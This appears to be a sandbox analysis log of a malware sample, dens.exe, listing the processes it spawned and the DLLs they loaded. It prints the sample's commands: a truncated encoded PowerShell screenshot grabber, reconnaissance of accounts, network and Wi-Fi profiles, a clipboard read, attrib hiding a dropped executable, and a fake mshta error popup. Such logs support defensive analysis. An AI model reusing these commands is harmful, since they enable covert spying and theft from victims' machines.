            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\dens.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: libssl-3.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: sbiedll.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\dens.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
